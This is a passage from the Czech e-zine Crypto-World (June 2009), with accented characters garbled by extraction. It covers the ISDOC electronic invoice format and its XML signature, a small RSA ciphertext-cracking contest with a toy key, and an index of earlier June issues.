Proč ISDOC vznikl a jakyacute je jeho ciacutel Bliacutezkyacutem ciacutelem vzniku formaacutetu bylo sjednotit elektronickou podobu několika ekonomickyacutech dokumentů fakturačniacute povahy (faktura dobropis vrubopis zaacutelohovaacute faktura daňovyacute zaacutelohovyacute list a jeho dobropis) a daacutet jiacute prostřednictviacutem spolupraacutece a podpory vyacuteznamnyacutech vyacuterobců na trhu k dispozici jejich klientům - firmaacutem ktereacute se zabyacutevajiacute obchodem či službami a ktereacute z nejrůznějšiacutech důvodů neimplementovaly žaacutedneacute jineacute obecneacute řešeniacute Vzdaacutelenyacutem ciacutelem pak je dosaacutehnout tiacutemto způsobem zvyacutešeniacute produktivity praacutece v segmentu vyacuteroby a distribuce zbožiacute i v segmentu služeb což v dlouhodobeacutem horizontu pomůže Českeacute republice jako celku se prosadit v evropskeacutem kontextu jako země s velkyacutem podiacutelem služeb s vysokou přidanou hodnotou Tiacutem aktivita ISDOC plniacute i jedno ze zaacutekladniacutech poslaacuteniacute sdruženiacute SPIS

Hlavniacute vyacutehody ISDOC Nevyžaduje pro komunikaci žaacutedneacuteho zprostředkovatele

Jedna z hlavniacutech vyacutehod tohoto formaacutetu XML soubor obsahuje elektronickyacute podpis a je tudiacutež plnohodnotnyacutem daňovyacutem dokladem V tomto smyslu neniacute podstatneacute jakaacute přenosovaacute infrastruktura je použita a jak došlo k doručeniacute dokladu od vystavitele k přiacutejemci Je možneacute tyto soubory posiacutelat jako přiacutelohu v běžneacutem e-mailu je možneacute použiacutevat zabezpečenyacute přenos pomociacute VPN či dalšiacutech řešeniacute (jako např bdquoNESS Trade Connectorldquo což je zabezpečenyacute přenos na uacuterovni B2B) nebo je možneacute soubory dopravovat na fyzickyacutech meacutediiacutech typu Flash či dokonce FD Důsledkem teacuteto vyacutehody je samozřejmě uacutespora transakčniacutech naacutekladů ktereacute např malyacutem firmaacutem doposud braacutenily takoveacute řešeniacute nasadit Tato vlastnost byla jedniacutem ze zaacutekladniacutech požadavků celeacuteho zadaacuteniacute formaacutetu ISDOC

Připouštiacute možnost zprostředkovatele komunikace

I když si tento bod možnaacute zdaacutenlivě odporuje s bodem předchoziacutem je takeacute důležityacute Formaacutet totiž připouštiacute i možnost třetiacute strany - zprostředkovatele komunikace mezi vyacutestavcem a přiacutejemcem kterou podporuje zvlaacuteštniacutemi bdquoroutovaciacutemildquo položkami Třetiacute strana do původně bilateraacutelniacuteho vztahu přinaacutešiacute zpravidla nějakou dalšiacute přidanou hodnotu za kterou jsou původniacute strany ochotny zaplatit Jedna z nejzajiacutemavějšiacutech je vyřešeniacute bezpečnostniacute problematiky jednotlivyacutech dokladů tak aby je cestou nemohl nikdo monitorovat daacutele to byacutevaacute notifikace přijetiacute dokladu zprostředkovatelem i přiacutejemcem vyřešeniacute souhlasu s přiacutejmem elektronickyacutech dokladů pomociacute všeobecnyacutech podmiacutenek zprostředkovatele a v neposledniacute řadě takeacute častaacute služba spočiacutevajiacuteciacute v archivaci jednotlivyacutech dokladů po zaacutekonnou dobu 10+1 let Přiacutekladem takoveacuteho řešeniacute může byacutet např Českaacute Spořitelna se svou službou FAKTURA 24 či již vyacuteše zmiacuteněnyacute systeacutem Datovyacutech schraacutenek kteryacute nabiacutedne oproti jinyacutem zaacutekonnou fikci doručeniacute dokumentu ve lhůtě 10 dnů Důsledkem možnosti využiacutet služeb intermediaacutetora nad formaacutetem ISDOC je možnost použitiacute stejneacuteho formaacutetu i pro relativně velkeacute subjekty jako jsou napřiacuteklad dodavateleacute ze segmentu utilit (tj energie vodaacuterenstviacute atd)

Formaacutet je pouze jeden

Pro pochopeniacute vyacuteznamu tohoto bodu je užitečneacute se podiacutevat do světa EDI (myšleno UN EDIFACT) což je dalšiacute formaacutet kteryacute naacuteš zaacutekon o DPH pro elektronickeacute daňoveacute doklady připouštiacute Definuje jej odkazem na bdquoDoporučeniacute komise 1994820ES ze dne 19řiacutejna 1994ldquo Zde je situace takovaacute že jednotliviacute dodavateleacute EDI řešeniacute často oborově zaměřeniacute si mohou z mnoha standardniacutech položek formaacutetu vybrat pro sveacute použitiacute pouze některeacute a na těch vystavět svůj tzv subset Vyacutesledkem je že firma kteraacute maacute ve sveacutem ISERP implemenovaacuten subset A přiacutemo nemůže komunikovat s firmou majiacuteciacute implementovaacuten subset B Musiacute z principu využiacutet služeb třetiacute strany kteraacute umiacute převeacutest protokoly jednotlivyacutech subsetů mezi

Crypto-World 62009

14

sebou což typicky byacutevaacute placenaacute služba Naproti tomu u formaacutetu ISDOC nic takoveacuteho neniacute třeba protože formaacutet je prostě jen jeden Samozřejmě je třeba se popasovat s probleacutemem oborovyacutech specifik kteryacute je v ISDOC vyřešen pomociacute hlavičkovyacutech a řaacutedkovyacutech uživatelskyacutech položek To jsou elementy v jejichž raacutemci může byacutet umiacutestěna libovolnaacute uživatelskaacute XML struktura kteraacute na rozdiacutel od zbytku formaacutetu nepodleacutehaacute kontrole pomociacute XSD scheacutematu a tudiacutež neniacute třeba s každou takovou uživatelskou variantou měnit zaacutekladniacute XSD scheacutema

Obecně je možneacute řiacuteci že Pracovniacute skupina pracovala celyacutech 14 měsiacuteců na tom aby formaacutet zohlednil všechna důležitaacute specifika českeacute daňoveacute legislativy Našiacutem ciacutelem bylo aby formaacutet byl schopen nahradit 95 faktur ktereacute se doposud vyskytovaly v papiacuterovyacutech firemniacutech transakciacutech Důsledkem vyacuteše zmiacuteněnyacutech vlastnostiacute pak je že pokud libovolnaacute firma použiacutevaacute fakturačniacute software podporujiacuteciacute formaacutet ISDOC a elektronicky fakturuje tak libovolneacute jineacute firmy podporujiacuteciacute takteacutež formaacutet ISDOC mohou tyto faktury přijiacutemat a jejich systeacutem je umiacute interpretovat A pokud přijiacutemaciacute systeacutem objeviacute uživatelskeacute položky kteryacutem rozumiacute tak je použije pokud ne tak je ignoruje V každeacutem přiacutepadě je ale faktura načtena jak položkově tak finančně Aby pravděpodobnost spraacutevneacute interpretace byla co nejvyššiacute iniciovalo sdruženiacute SPIS již jmenovanou ldquoDeklaraci o společneacutem postupu v oblasti elektronickeacute fakturacerdquo na ktereacute se kromě již zmiacuteněnyacutech firem shodli i dalšiacute vyacuteznamneacute firmy z oboru ISERP jako jsou Karat Software Gordic Asseco ČR či dokonce zaacutestupci nadnaacuterodniacutech gigantů jako Microsoft nebo SAP ČR Po vyhlaacutešeniacute formaacutetu v březnu 2009 se k Deklaraci začaly připojovat dalšiacute firmy K 162009 je jejich vyacutečet naacutesledujiacuteciacute Accord ALTEC ALTUS software COMPEKON MICRODATA ORTEX TILL CONSULT TRIADA VERA a WinStrom

Z čeho jsme vychaacutezeli Formaacutet ISDOC vychaacuteziacute filozoficky z formaacutetu UBL 20 definovaneacuteho mezinaacuterodniacutem sdruženiacutem OASIS (wwwoasis-openorg) Z teacuteto normy jsme původně vyšli a chviacuteli se zdaacutelo že budeme moci jen popsat co ktereacute položky znamenajiacute a můžeme začiacutet implementovat do svyacutech systeacutemů Časem se ale začaly objevovat probleacutemy jak naplnit ten či onen legislativniacute požadavek a v určitou chviacuteli bylo jasneacute že budeme muset pro některeacute funkčnosti použiacutet vlastniacute položky protože UBL nic podobneacuteho neřešiacute (napřiacuteklad problematika daňovyacutech zaacuteloh počiacutetaacuteniacute DPH metodou zdola nebo shora atd) Tak se v naacutevrhu objevil kromě čtyř původniacutech jmennyacutech prostorů i jeden novyacute ndash bdquoisdldquo ve ktereacutem jsme koncentrovali veškereacute noveacute či pozměněneacute položky Když jsme začali daacutevat dohromady jednotlivaacute XML scheacutemata (soubory XSD) tak se velmi rychle ukaacutezalo že vyacuteslednyacute popis i formaacutet je složityacute a nepřehlednyacute A tak jsme nakonec definovali jedinyacute jmennyacute prostor kteryacute cca z 12 vychaacuteziacute z položek a datovyacutech typů UBL a ze druheacute poloviny je doplněn položkami vlastniacutemi Všechny položky majiacute samozřejmě anglickeacute naacutezvy a kde to bylo možneacute použili jsme datovyacute typ shodnyacute s UBL 20

Hlavniacute rysy technickeacuteho řešeniacute Viacutece druhů dokladů faktura čniacute povahy

Jak již bylo zmiacuteněno formaacutet ISDOC řešiacute všechny zaacutekladniacute dokumenty fakturačniacute povahy ktereacute se mohou vyskytovat v běžneacute firemniacute praxi Jednaacute se konkreacutetně o fakturu vč podpory zuacutečtovaacuteniacute daňovyacutech i přiacutepadnyacutech nedaňovyacutech zaacutelohovyacutech listů dobropis vrubopis zaacutelohovou fakturu (myšleno nedaňovyacute zaacutelohovyacute list) daňovyacute zaacutelohovyacute list a dobropis daňoveacuteho zaacutelohoveacuteho listu

Crypto-World 62009

15

Doklady v miacutestniacute i ciziacute měně

Všechny doklady mohou byacutet buď v miacutestniacute nebo v jedneacute ciziacute měně Tuto omezujiacuteciacute podmiacutenku jsme stanovili po analyacuteze vyacuteskytu cizoměnnyacutech dokladů s viacutece než jednou měnou Podle našich zjištěniacute je takovyacutech dokladů jen velmi maleacute množstviacute Z tohoto důvodu a současně takeacute z důvodu neuacuteměrneacuteho zkomplikovaacuteniacute vnitřniacutech vazeb jsme rozhodli se touto variantou nadaacutele nezabyacutevat Identifikace až 5-ti různyacutech stran na dokladu

Protože na dokladech se běžně vyskytujiacute kromě adres odběratele a dodavatele zapsanyacutech v obchodniacutem rejstřiacuteku ještě adresy dalšiacute např adresy fakturačniacutech miacutest či adresy dodaacuteniacute podporuje ISDOC až 5 takovyacutech Důležiteacute je to i proto že zaacutekon dovoluje pověřit fakturaciacute třetiacute osobu Důležiteacute je že rozlišovaciacute položky pro identifikaci firem dovolujiacute použitiacute jak firemniacutech (proprietaacuterniacutech) koacutedů tak celosvětovyacutech GLN (Global Location Number) identifikaacutetorů a samozřejmě takeacute naacuterodniacutech identifikačniacutech čiacutesel kteryacutem je v ČR uacutedaj IČ

Identifikace zbožiacute až 5-ti rozlišujiacuteciacutemi uacutedaji

Podobně jako v přiacutepadě firem je u rozlišeniacute zbožiacute podporovaacuteno hned několik druhů identifikaacutetorů Jsou to až 3 různeacute koacutedy podle dodavatele daacutele globaacutelniacute identifikaacutetor typu EAN a pro spolupraacutece typu bdquomalyacute dodavatel a obrovskyacute odběratelldquo i koacutedy zbožiacute podle odběratele

Podpora seacuteriovyacutech čiacutesel a šaržiacute vč expiraciacute

Protože předmětem obchodu a tedy i fakturace je často zbožiacute u ktereacuteho je třeba evidovat jednotlivaacute seacuteriovaacute čiacutesla (typicky velkaacute elektronika) nebo seacuterie zbožiacute se stejnou šaržiacute (typicky leacuteky či potraviny) obsahuje ISDOC přiacuteslušneacute kolekce i na tyto eventuality

Možnost použitiacute tzv uživatelskyacutech položek

Technicky se jednaacute o zvlaacuteštniacute nevalidovaneacute kolekce hlavičkovyacutech a řaacutedkovyacutech položek ktereacute nejsou zaacuteměrně nijak svaacutezaacuteny s hlavniacutem XSD scheacutematem Tiacutem je možno ve standardizovaneacutem formaacutetu použiacutevat i položky na kteryacutech se vyacutestavce a přiacutejemce dohodli bilateraacutelně Napřiacuteklad bude-li nutno na fakturačniacutem řaacutedku se spotřebou elektrickeacute energie v KWh přeneacutest ještě doplňkovou informaci v jakyacutech sazbaacutech se čerpaacuteniacute uskutečnilo jakyacute byl paušaacutelniacute poplatek za konkreacutetniacute elektroměr a nakolik zaacutekaniacutek využil možnost vyacutekupu zeleneacute energie tak je to touto cestou možneacute aniž je nutno měnit celkovou verzi formaacutetu a na všech stranaacutech jiacute implementovat V praxi tak informačniacute systeacutemy vyacutestavce a přiacutejemce mohou byacutet upraveny k použiacutevaacuteniacute těchto položek zatiacutemco ostatniacute systeacutemy tyto položky nebudou interpretovat protože tyto nejsou popsaacuteny ve validačniacutech scheacutematech Položky povinneacute pro daňovyacute doklad však obsahuje každyacute soubor ISDOC

Řešeniacute přiacuteloh jako dokumentů majiacuteciacutech praacutevniacute relevanci k faktuře

Protože v papiacuteroveacute praxi se často vyskytujiacute u faktur takeacute přiacutelohy ktereacute mohou miacutet i praacutevniacute relevanci k mateřskeacutemu dokladu museli jsme za viděniacute ciacutele nahradit papiacuteroveacute řešeniacute elektronickyacutem řešit i tyto situace Přiacutelohy mohou obsahovat napřiacuteklad všeobecneacute obchodniacute podmiacutenky přiacutelohou může byacutet kalkulačniacute list k faktuře na parkety stejně jako fotografie billboardu k faktuře na reklamniacute služby Řešeniacute se v zaacutesadě děliacute na ty ktereacute musiacute omezit velikost přiacuteloh a na ty ostatniacute kde to nutneacute neniacute K omezeniacute velikosti přiacuteloh se přistupuje v přiacutepadě kdy přiacutelohy jsou součaacutestiacute samotneacuteho XML (v přiacuteslušneacutem koacutedovaacuteniacute např BASE64) a jejich nadměrnaacute velikost by tak mohla zcela ochromit zachaacutezeniacute s přiacuteslušnyacutem souborem (funce načteniacute do paměti verifikace proti XSD atd) Proto jsme se v definici ISDOC vydali druhou cestou kterou je udržovaacuteniacute přiacuteloh mimo vlastniacute XML soubor ndash v jineacutem datoveacutem

Crypto-World 62009

16

kontejneru Formaacutet ISDOC jsou tedy ve skutečnosti formaacutety dva Jeden je soubor isdoc což je vnitřně bdquoklasickyacuteldquo XML soubor kteryacute neobsahuje žaacutedneacute přiacutelohy a použije se praacutevě v tomto přiacutepadě Druhyacutem formaacutetem je soubor isdocx kteryacute je vnitřně souborem typu ZIP a kteryacute může kromě bdquohlavniacuteholdquo souboru isdoc neacutest i libovolneacute dalšiacute soubory jako přiacutelohy daneacuteho dokladu Vtip je v tom že jednotliveacute přiacutelohy jsou referencovaacuteny v přiacuteslušneacute kolekci bdquohlavniacuteholdquo isdoc souboru svyacutem jmeacutenem a SHA1 otiskem A jak již bylo uvedeno celyacute obsah dokladu isdoc je podepsaacuten elpodpisem Tiacutem jsou soubory přiacuteloh sice technicky umiacutestěny vně XML (a nezdržujiacute jeho zpracovaacuteniacute) ale současně se jakaacutekoliv manipulace s přiacutelohami okamžitě projeviacute porušeniacutem SHA1 otisků jednotlivyacutech přiacuteloh přiacutepadně rovnou neplatnostiacute elektronickeacuteho podpisu celeacute faktury pokud by se někdo pokoušel v niacute SHA1 otisky přiacuteloh ručně přepsat Tiacutem by byl soubor isdoc prohlaacutešen za neautentickyacute (pozměněnyacute) Vyacutesledneacute řešeniacute tedy splňuje splňuje stejnaacute bezpečnostniacute kriteacuteria jako kdyby přiacutelohy byly celeacute součaacutestiacute jedineacuteho podepsaneacuteho XML

Vlastniacute implementace elektronickeacuteho podpisu Po provedeniacute rešerše technik podepisovaacuteniacute jsme pro přiacutepad podepisovaacuteniacute XML souboru isdoc zvolili normu XMLSig metodu Enveloped Jejiacutem principem je že těsně před ukončeniacutem rootoveacuteho elementu kteryacutem je v našem přiacutepadě element ltInvoicegt se vložiacute element ltSignaturegt ve ktereacutem se celyacute podpis odehraacutevaacute Uvnitř tohoto elementu jsou pak tři dalšiacute ltSignedInfogtltSignatureValuegtltKeyInfogt Element ltSignedInfogt obsahuje kromě popisu algoritmů digitaacutelniacuteho otisku algoritmů kanonikalizace a elektronickeacuteho podpisu hlavně vlastniacute digitaacutelniacute otisk celeacuteho XML dokumentu a to v elementu ltDigestValuegt Kanonikalizace je metoda kteraacute uvnitř struktury XML vyřadiacute přebytečneacute mezery viacutecenaacutesobneacute konce řaacutedků a dalšiacute neproduktivniacute znaky Pozor ale tato metoda nijak nemanipuluje s vlastniacutemi daty jednotlivyacutech elementů ktereacute i po kanonikalizaci zůstaacutevajiacute v původniacutem tvaru řešiacute pouze znaky ve struktuře XML Napřiacuteklad tedy pokud atribut nějakeacuteho elmentu je zbytečně posunut vpravo a podobně Po kanonikalizaci je proveden otisk přiacuteslušnyacutem algoritmem a pak je již programem složen celyacute element ltSignedInfogt Na tento element je naacutesledně aplikovaacuten elektronickyacute podpis zvolenou metodou v drtiveacute většině se použiacutevaacute algoritmus RSA a vyacutesledek je uložen do elementu ltSignatureValuegt Aby přiacutejemce měl vždy po ruce veřejnyacute kliacuteč podepisujiacuteciacute osoby je jako třetiacute element přidaacutena binaacuterniacute reprezentace jeho certifikaacutetu a to do jednoho z podelementů elementu ltKeyInfogt

Poznaacutemka od 112010 je podle světovyacutech doporučeniacute zapovězeno v systeacutemech veřejneacute spraacutevy v ČR použiacutevaacuteniacute digitaacutelniacutech otisků algoritmem SHA1 a je nutno přejiacutet na některyacute vyššiacute algoritmus z rodiny SHA2 napřiacuteklad SHA256 Pracovniacute skupina SPIS na tomto probleacutemu aktuaacutelně pracuje

Konkreacutetniacute provedeniacute podpisu v XML souboru faktury by mohlo po určiteacutem zjednodušeniacute a naformaacutetovaacuteniacute vypadat např takto

ltxml version=10 encoding=utf-8gt ltInvoice xmlns=httpisdoccznamespaceinvoice version=51gt lt--helliphelliphelliphelliphelliphellip--gt ltmdashpoložky dokumentu faktura--gt lt--helliphelliphelliphelliphelliphellip--gt ltPaymentMeansgt ltmdashposledni element nepodepsane faktury- --gt ltPaymentMeansgt

Crypto-World 62009

17

ltSignature xmlns=httpwwww3org200009xmldsi ggt ltSignedInfogt

ltCanonicalizationMethod Algorithm=httpwwww3or gTR2001REC-xml- c14n-20010315gt ltSignatureMethod Algorithm=httpwwww3org2000 09xmldsigrsa- sha1gt

ltReference URI=gt ltTransformsgt

ltTransform Algorithm=httpwwww3org200009xml dsigenveloped-signaturegt

ltTransformsgt ltDigestMethod Algorithm=httpwwww3org2000 09xmldsigsha1gt ltDigestValuegt29hg161shG5T0cuwyUEQZiHmn4=ltDiges tValuegt ltReferencegt ltSignedInfogt ltSignatureValuegtrJgOKTSyaGb5 atd==ltSignatureVa luegt ltKeyInfogt ltX509Datagt ltX509CertificategtMIIEVCCAz+gAKoZIhvcNAQAwaDELmak GA1UEBhMCQ1ox hellip vlastni klientskyacute certifikaacutet hellip qoF4Y1IgJ0w16ws= ltX509Certificategt ltX509Datagt ltKeyInfogt ltSignaturegt ltInvoicegt

Podpora formaacutetu v jednotlivyacutech ISERP V době psaniacute tohoto člaacutenku (červen 2009) ještě neniacute možneacute hodnotit uacuteroveň implementace v jednotlivyacutech IS protože většina vyacuterobců jiacute plaacutenuje až do podzimniacutech nebo zimniacutech legislativniacutech verziacute Nepochybně bude velmi zajiacutemaveacute porovnat jak jednotliviacute vyacuterobci k implementaci formaacutetu ISDOC ve svyacutech systeacutemech přistoupili Ať to ale provedou tak či onak důležiteacute je že fakturu nebude v systeacutemu přiacutejemce třeba znovu typovat a že položky budou automaticky (nebo alespoň poloautomaticky) rozeznaacuteny V tom se skryacutevaacute siacutela celeacuteho řešeniacute na straně přiacutejemce

Podpora formaacutetu externiacutemi naacutestroji Pro uacutečely podpory průmysloveacuteho nasazeniacute formaacutetu ISDOC již existujiacute i externiacute naacutestroje Jeden z nich vyvinula firma ABRA Software a pojmenovala jej ISDOCReader Jde o freeware tj program kteryacute je možneacute kdykoliv staacutehnout z přiacuteslušneacute adresy (wwwisdocorg) a začiacutet jej volně použiacutevat Tento naacutestroj provede po instalaci asociaci s oběma variantami formaacutetu ISDOC (isdoc i isdocx) a stane se tak vyacutechoziacutem prohliacutežečem tohoto formaacutetu ISDOCReader dovoluje libovolnyacute fakturačniacute doklad zobrazit do vizuaacutelniacute podoby faktury ověřit přiacuteslušnyacutem tlačiacutetkem elektronickyacute podpis dokladu přiacutepadně si doklad i vytisknout Je takeacute možneacute prohliacutežet a exportovat přiacutepadneacute přiacutelohy faktury Dalšiacutem krokem bdquoworkflowldquo zpracovaacuteniacute došleacute elektronickeacute faktury v menšiacute firmě je pak jejiacute postoupeniacute k automatickeacutemu či poloautomatickeacutemu zpracovaacuteniacute do ISERP přiacutejemce k čemuž je opět přiacuteslušneacute tlačiacutetko Technicky bude možnost odeslaacuteniacute dokladu do libovolneacuteho ISERP vyřešena pomociacute konfiguračniacuteho souboru kteryacute si každyacute vyacuterobce bude moci daacutet do sveacute instalace a kteryacute ISDOCReader bude volat

Crypto-World 62009

18

Přiacuteklad použitiacute freewaroveacuteho naacutestroje ISDOCReader na ověřeniacute elpodpisu

Pokud se některyacute z laskavyacutech čtenaacuteřů bude zajiacutemat o projekt ISDOC podrobněji dalšiacute informace včetně posledniacute verze formaacutetu dokumentace jeho datovyacutech struktur přiacutekladů datovyacutech souborů i aktuaacutelniacutech uacutedajů o podpoře formaacutetu jednotlivyacutemi vyacuterobci software nalezne na adrese wwwisdoccz Literatura

[1] Kolektiv autorů Dokumentace ke standardu UBL 20 [online] Dostupnyacute z WWW lthttpdocsoasis-openorgublcs-UBL-20UBL-20htmlgt

[2] Kosek Jiřiacute XML scheacutemata [online] Dostupnyacute z WWW lthttpwwwkosekczxmlschemawxshtmlgt

[3] Kolektiv autorů XSD Schema tutorial [online] Dostupnyacute z WWW lthttpwwww3schoolscomschemadefaultaspgt

[4] Kolektiv autorů sdruženiacute W3c Dokumentace ke Xmldsig [online] Dostupnyacute z WWW lthttpwwww3orgTRxmldsig-coregt

[5] Kolektiv autorů Pracovniacute skupiny pro elektronickou fakturaci SPIS Dokumentace k formaacutetu ISDOC [online] Dostupnyacute z WWW lthttpwwwisdocczgt

Crypto-World 62009

19

D Malaacute soutěž v luštěniacute RSA Pavel Vondruška (pavelvondruskacrypto-worldinfo)

Pro přiacuteznivce našich podzimniacutech soutěžiacute v luštěniacute ale samozřejmě i dalšiacute čtenaacuteře jsem připravil naacutesledujiacuteciacute drobnou uacutelohu Soutěžniacutem uacutekolem je rozluštěniacute šifroveacuteho textu 14 39 07 57 18 34 10 47 17 92 06 31 28 65 32 92 11 41 26 31 26 29 20 80 25 06 00 77 03 60 09 00 03 60 11 44 31 00 05 41 07 92 06 16 04 70 10 75 03 60 18 79 00 46 26 73 23 49 25 18 13 90 K zašifrovaacuteniacute otevřeneacuteho textu byl použit algoritmus RSA a formaacutetovaacuteniacute CW10 (detaily viz naacutepověda) veřejnyacute kliacuteč je (Ne)=(3337 79)

Při luštěniacute se řešitel seznaacutemiacute s algoritmem RSA a uvědomiacute si jak uacutezce souvisiacute bezpečnost algoritmu s modulem N Pro prveacute dva řešitele je připravena odměna V přiacutepadě zaacutejmu se mohou bezplatně zuacutečastnit kurzu Problematika infrastruktury veřejnyacutech kliacutečů (PKI)ldquo kterou 2562009 pořaacutedaacute akademie CZNIC (httpwwwnicczakademiecourse15detail) Lektorem kurzu je PVondruška Svaacute řešeniacute zasiacutelejte na adresu pavelvondruskacrypto-worldinfo Řešeniacute uacutelohy a jmeacutena všech uacutespěšnyacutech luštitelů budou zveřejněna v letniacutem dvojčiacutesle e-zinu Crypto-World 7-82009 kteryacute vyjde 182009 Z tohoto důvodu společně s řešeniacutem zašlete souhlas se zveřejněniacutem sveacuteho jmeacutena resp nickpseudonym kteryacute může byacutet miacutesto něj zveřejněn Přeji pěknou zaacutebavu

Doplňujiacuteciacute informace k soutěžniacute uacuteloze

1 Použityacute šifrovaciacute algoritmus

V podstatě se jednaacute o klasickyacute šifrovaciacute algoritmus založenyacute na RSA kde však otevřenyacute text neniacute formaacutetovaacuten podle PKCS 1 (verze 152021) ale podle naacutemi zadanyacutech pravidel kteraacute označiacuteme jako CW 10 2 Asymetrickyacute algoritmus RSA

Zvoliacuteme prvočiacutesla p a q a vypočteme N = pq

Φ(N) = (p-1)(q-1)

Daacutele zvoliacuteme naacutehodneacute čiacuteslo e kde

Crypto-World 62009

20

1 lt e lt Φ(N) takoveacute že e a Φ(N) jsou nesoudělnaacute

Vypočteme čiacuteslo d takoveacute že

1 lt d lt Φ(N) a

ed equiv 1 mod Φ(N)

Dvojici (Nd) nazveme soukromyacute kliacuteč a (Ne) veřejnyacute kliacuteč

3 Formaacutetovaacuteniacute zpraacutevy (CW10)

Zpraacutevu M překoacutedujeme nejprve do čiacuteselneacuteho tvaru K tomu použijeme některou vhodnou převodovou tabulku Např tuto tabulku

0 1 2 3 4 5 6 7 8 9 6 0 Mezera 2 3 4 A B C D E 7 F G H I J K L M N O 8 P Q R S T U V W X Y 9 Z 1 2 3 4 5 6 7 8 9 Zpraacutevu M pak zformaacutetujeme do posloupnosti čiacutesel pevneacute deacutelky (deacutelka bude rovna deacutelce modulu N) K tomu použijeme vlastniacute formaacutetovaacuteniacute kteraacute pracovně nazveme CW10 Formaacutetovaacuteniacute CW10 1) Maacute-li modul deacutelku k budeme zpraacutevu převedenou podle tabulky dělit na skupiny deacutelky k-1 2) Všechny skupiny musiacute miacutet deacutelku k-1 nemaacute-li proto posledniacute skupina tuto deacutelku doplniacuteme

ji zprava přiacuteslušnyacutem počtem nul 3) Všechny ziacuteskaneacute skupiny nyniacute doplniacuteme zleva jednou nulou Deacutelka každeacute skupiny je po

těchto uacutepravaacutech rovna k 4) Vyacutesledek po šifrovaacuteniacute maacute deacutelku rovnou maximaacutelně k nemaacute-li ji doplniacuteme vyacutesledek zleva

nulami Ziacuteskanyacute vyacutesledek po formaacutetovaacuteniacute M označme M= m1 m2 m3 hellip 4 Zašifrovaacuteniacute zpraacutevy M

Zašifrovaacuteniacutem zpraacutevy M pomociacute veřejneacuteho kliacuteče (Ne) rozumiacuteme řetězec

P = C1 C2 C3 kde

C1 equiv m1e mod N C2 equiv m2

e mod N C3 equiv m3e mod N Ci equiv mi

e mod N

5 Dešifrovaacuteniacute zpraacutevy P

Dešifrovaacuteniacute zpraacutevy P se pak provede tak že použijeme soukromyacute exponent d a tiacutem ziacuteskaacuteme původniacute zpraacutevu M

m1 equiv C1d mod N m2 equiv C2

d mod N m3 equiv C3d mod N mi equiv Cid mod N

6 Bezpečnost Pokud dokaacuteže přiacutejemce udržet svůj soukromyacute kliacuteč v tajnosti (a čiacutesla p a q byla dostatečně velkaacute) pak je ze znalosti šifroveacute zpraacutevy a veřejneacuteho kliacuteče vyacutepočetně složiteacute ziacuteskat otevřenou zpraacutevu

Crypto-World 62009

21

E O čem jsme psali v červnu 2000 ndash 2008 Crypto-World 62000 A Novaacute evropskaacute iniciativa v oblasti kryptografie (JPinkava) 2 B Fermatův test primality Carmichaelova čiacutesla bezčtvercovaacute čiacutesla (PVondruška)3 -5 C Červ LOVE-LETTER-FOR-YOUTXTVBS (PVondruška) 6-8 D EUROCRYPT 2000 (PVondruška) 9-11 E Code Talkers (IIIdiacutel) (PVondruška) 12-14 F Letem šifrovyacutem světem 15 G Zaacutevěrečneacute informace 16 Přiacuteloha Navajo Code Talkers revize z 1561945 soubor Dictionaryhtm

Crypto-World 62001 A Zaacutehadnaacute paacuteska z Prahy IIdiacutel (PVondruška JJanečko) 2- 6 B Radioaktivniacute rozpad a kryptografickeacute kliacuteče (LSmoliacutek) 7-9 C Kryptografie a normy diacutel 8 - Normy IETF - SMIME (J Pinkava) 10-13 D Počiacutetačovyacute kurs Lidovyacutech novin (PVondruška) 14-15 E Security and Protection of Information (D Cvrček) 16 F Praacutevniacute odpovědnost poskytovatelů (JMatejka) 17-23 G Ukončeniacute platnosti zneplatněniacute (a zrušeniacute) certifikaacutetu IIdiacutel (JProkeš) 24-25 H Letem šifrovyacutem světem 26-27 I Zaacutevěrečneacute informace 28 Přiacuteloha priloha6zip (fotografie Security 2001 teacutemata přednaacutešek na konferenci Eurocryptacute2001)

Crypto-World 62002 A Historie a statistika Crypto-Worldu (PVondruška) 2-4 B Digitaacutelniacute certifikaacutety IETF-PKIX čaacutest 4 (JPinkava) 5-8 C Bezpečnost informačniacuteho systeacutemu pro certifikačniacute služby (ISCS)

a objektovaacute bezpečnost (PVondruška) 9-16 D Informace - Cryptology ePrint Archive (VKliacutema) 17 E Letem šifrovyacutem světem 18-19

1 Kritika člaacutenku Je 1024-bitovaacute deacutelka kliacuteče RSA dostatečnaacute (Crypto-World 52002)

2 Zaacutekon o elektronickeacutem podpisu novelizovaacuten - Zaacutekon č 2262002 Sb 3 Hackeři pomozte 4 O čem jsme psali v červnu 2000 a 2001

F Zaacutevěrečneacute informace 20

Crypto-World 62003 A Nebezpečiacute internetovyacutech řešeniacute (MKuchař) 2-6 B Digitaacutelniacute certifikaacutety IETF-PKIX čaacutest 13

Atributoveacute certifikaacutety ndash diacutel 2 (JPinkava) 7-10 C Kryptografickeacute protokoly s nulovyacutem předaacuteniacutem znalostiacute(JPinkava) 11-12 D Elektronickeacute peniacuteze (PVondruška) 13-20 E Letem šifrovyacutem světem 21-23 F Zaacutevěrečneacute informace 24

Crypto-World 62009

22

Crypto-World 62004 A Měsiacutec prvočiacutesel (PVondruška) 2-5 B Statistickyacute rozbor největšiacuteho prvočiacutesla (PTesař) 6-7 C Program STORK - vstupniacute dokumenty přiacuteprava (E-CRYPT) čaacutest 2 (JPinkava) 8-16 D Letem šifrovyacutem světem 17-18 E Zaacutevěrečneacute informace 19

Crypto-World 62005 A Informace pro čtenaacuteře a autory (PVondruška) 2-3 B Kontrola certifikačniacute cesty čaacutest 1 (P Rybaacuter) 4-11 C O neziacuteskateľnosti rodneacuteho čiacutesla z jeho hashu (M Pivoluska) 12-13 D Přehledovaacute zpraacuteva o vyacuteznamnyacutech publikaciacutech a projektech na teacutema

poskytovaacuteniacute anonymity klasifikace a měřitelnost informačniacuteho soukromiacute (privacy) čaacutest 2 (M Kumpošt) 14-17

E Kryptografickeacute eskalačniacute protokoly čaacutest 1 (J Krhovjaacutek) 18-21 F Recenze knihy Jon Erickson Hacking - uměniacute exploitace 22 G O čem jsme psali v červnu 2000-2004 23 H Zaacutevěrečneacute informace 24

Crypto-World 62006 A PKI roaming (L Dostaacutelek) 2-4 B Vyhlaacuteška o podrobnostech atestačniacuteho řiacutezeniacute pro elektronickeacute naacutestroje

a lehkyacute uacutevod do časoveacute synchronizace (P Vondruška) 5-9 C Univerzaacutelniacute posilovače hašovaciacutech funkciacute včetně MD5 a SHA1

aneb zaacutechranneacute kolo pro zoufalce (V Kliacutema) 10-14 D NIST (National Institute of Standards and Technology - USA) a kryptografie Recommendation on Key Management ndash čaacutest 2

